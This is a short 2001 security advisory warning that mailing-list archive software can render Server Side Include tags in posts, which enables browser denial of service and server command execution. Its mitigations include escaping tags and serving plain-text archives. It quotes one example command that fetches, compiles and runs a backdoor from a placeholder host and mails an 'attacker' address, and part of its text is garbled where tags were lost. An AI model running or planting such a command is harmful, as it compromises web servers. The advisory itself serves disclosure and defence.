admin@cgisecurity.com Email Archives may allow Distributed Attacks against users and Web servers I Introduction Mailing lists are often archived for later viewing on websites. The software that archives these email messages may allow an attacker to execute commands, include false information, cause a wide scale browser DOS, and other possibilities. Millions of sites archive these mailing lists and each site archiving a malicious post could either be attacked or help launch an attack. II Examples: Server Side Includes If an attacker sends a email with a Server Side include(SSI) tag it may be possible to carry out the following attack types listed below. * (Client side) Including of large files, which may lead in a small Denial of Service of clients. (Bandwidth consumption, Memory consumption, etc...) * (Client/Server side) Including of local files such as /dev/urandom. Which will not only slow down the server and eat up bandwidth , but possibly DOS the client viewing the page. * (Server side) Commands to get executed. The server may execute the SSI request if the server is configured correctly. This could lead to possible web server compromise. With the right series of commands an attacker could download and install a backdoor with web server privileges. Below is a example to give you an idea. id;wget http://host/backdoor.c;cc backdoor.c;./a.out ;mail attacker@host is present to help prevent execution of html/other. (Example: hi becomes <\b>hi<\/b> or becomes <\b/>hi<\/b/> ) * Removing the < and > all together , but if program code or math is involved in the post it may remove important information. * The best solution would be to print out the archives in txt format so no code can be executed. Published to the Public October 2001 Copyright October 2001 Cgisecurity.com